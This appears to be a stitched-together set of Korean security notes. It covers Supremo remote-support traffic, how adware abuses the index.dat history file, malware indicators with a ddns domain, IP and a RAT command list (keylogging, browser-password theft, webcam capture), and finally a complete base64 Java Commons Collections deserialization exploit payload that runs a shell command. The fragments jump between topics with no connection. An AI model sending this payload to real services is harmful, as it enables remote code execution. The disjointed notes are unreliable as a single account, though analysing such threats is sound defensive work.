원격 지원 프로그램 중 supremo 프로그램이 존재하는데 해당 프로그램 실행 시, HTTP 통신 (POST)를 통해 주기적인 Communication이 이뤄지고 있음이 확인된다.
최초에는 해당 HTTP POST 통신이 주기적으로 이뤄지고 있고, 해당 통신이 이뤄지는 서버에 접속 시, Directory Listing 되며, 해당 디렉토리 내부의 파일이 보여짐에 따라 악의적인 서버와의 통신이 아닐까 생각하였다.
추가적인 확인 결과 RTC Gateway를 이용한 원격 통신 형태의 한 형식임을 확인하였다. RTC란, Real Time Communication의 약자로 브라우저 간의 통신으로 메시지, 영상, 음성 데이터를 주고 받을 수 있도록 해주는
일종의 규격으로 이해를 했다. 이것은 W3C에서 제시되었다고 한다.
아래와 같은 통신을 진행한다.
자세한 사항은 추후에 좀 더 찾아봐야하겠다.
일반적인 PC 사용자들은 index.dat 파일에 대해서 알지 못할 것으로 판단된다. index, 색인이라는 뜻을 가진 이 파일의 의미는 무엇일까? 1차적으로 확인해 본 결과 PC 사용자가 접근한 Online 정보 (URL 접속 정보 등) 및 파일 접근 경로 등에 대한 정보를 가지고 있다.
PC에서 이 파일을 가지고 있는 이유는 무엇일까? 알려진데로 index.dat에 기록된 접근 경로를 다시 접근할 때, index.dat 파일을 참조하여 접근할 수 있도록 하여 사용자가 원하는 접근의 속도를 향상 시키기 위함에 있다고 볼 수 있다.
CPU와 메모리 사이에 cache가 존재하여 CPU와 메모리 사이의 속도 차이를 개선/극복하듯이 이 또한 유사한 원리를 통해 사용자의 PC 사용을 원활케 한다. 모든 편리함 혹은 기능 개선을 위한 기술을 악용하는 공격자가 존재할 수 있는데, index.dat 파일을 이용한 악의적인 행위를 우리는 확인해 볼 수 있다.
궁금해하는 누군가가 무엇을 하는지? 무엇에 관심이 있는지? 물음을 가지고 있다면 이 파일을 이용할 수 있을 것이다. 어느 날, 누군가가 어제 밤 어디어디 사이트에 접속하셨군요, 어디어디에 관심있으세요? 라고 물어온다면
단순히 중간에서 스니핑한 것이 아니라 자신의 시스템에 악성 코드 혹은 애드웨어의 감염을 의심해봐야한다.
악성코드/애드웨어는 index.dat 파일의 내용을 기반으로 특정 사이트 접근 시, 팝업 혹은 특정 악성 행위를 수행하도록 할 수 있으며, 다수의 시스템 감염으로 확보된 index.dat 파일을 기반으로 통계 데이터 생성 후, 2차 행위를 수행할 수 있을 것이다.
참고 사이트 : http://forensic-proof.com/archives/243
https://en.wikipedia.org/wiki/Index.dat
# 도메인
omc2015asm.ddns.net - 185.86.162.29
# 호스트 변화
%APPDATA%\[랜덤문자열]\[랜덤문자열].exe
시작프로그램 등록
%TMP%\pid.txt
%TMP%\lol.bin
# 백도어 의심 문자열
NEW2015
ViewClientFiles
saveTextEdit
SearchFilesFromClient
StopSearchingFiles
CreateNewFolder
ViewRecycleBin
RestoreFromRecycleBin
MoveFromRecycleBin
DeleteFromRecycleBin
EmptyFilesRecycleBin
MoveFilesToDir
CopyFilesToDir
MoveFilesToRecycleBin
DeleteFileFromDrive
DownloadFilesFromClient
UploadFilestoClient
EmailThisFiles
UploadFromURL
renameClientID
getProcessList
SuspendClientProcess
ResumeClientProcess
EndClientProcess
getWindowsList
WindowMaximized
WindowMinimized
WindowRestore
WindowRename
WindowClose
getServicesRunning
StartClientService
StopClientService
getClientRegistry
regEditRegValue
CreateRegistryKey
regRenameRegValue
regDelRegValue
regDelRegKey
refreshReg
getClientStartupfiles
getClientInstalledfiles
getClientAllInstalledfiles
StartRemoteDesktopControl
StopRemoteDesktopControl
RemoteDesktopControlSize
RemoteDesktopControlQuality
MouseRightMove
MouseLeftMove
KeyboardPress
KeyboardXPress
getClientWebcamDevices
startClientWebcam
stopClientWebcam
getClientKeystrokes
ViewKeylogFiles
DeleteKeylogFile
getBrowserPasswords
StartClientMicSounds
StopClientMicSounds
PlayRecordedMicSounds
RunCmdLines
StartVBScript
StartBATScript
ShellExecuteCommand
SendIMStream
OpenCDROMDrive
CloseCDROMDrive
MsgBoxWindowList
ClientMessageBox
DesktopWallpaper
TextToSpeech
PlayMP3File
ShutDownPC
RestartPC
StandByPC
getMoreInfo
refreshClientInfo
ViewClientInThumbnail
UpdateClientFromFile
UpdateClientFromURL
TerminateClientFile
UninstallClientFile
onConnectUploadFromURL
ListofFaveFolders
PCDriveList
FilesAndFoldersList
ClientFiles
SearchedFiles
SearchedFilesDone
FilesInRecycleBin
DLFilesToHost
ClientProcesses
ClientServices
StartupFilesList
ClientInstalledfiles
RemoteDesktopControlImg
ClientWebcamDevices
ClientWebcamImages
KeystrokeLogFiles
KeystrokeViewlogsFiles
ClientMicSounds
SendChatMessage
ClientWindowListMB
ClientAdditionalInfo
http://blog.chaitin.com/2015-11-11_java_unserialize_rce/
http://www.so-cools.com/
http://www.infoq.com/news/2015/11/commons-exploit
http://evil0x7.cn/2015/11/08/commons-collection-vulnerability/
rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQAEHRvdWNoIC90bXAvcHduZWR0AARleGVjdXEAfgAeAAAAAXEAfgAjc3EAfgARc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4dnIAEmphdmEubGFuZy5PdmVycmlkZQAAAAAAAAAAAAAAeHBxAH4AOg==
IC90bXAvcHduZWR0
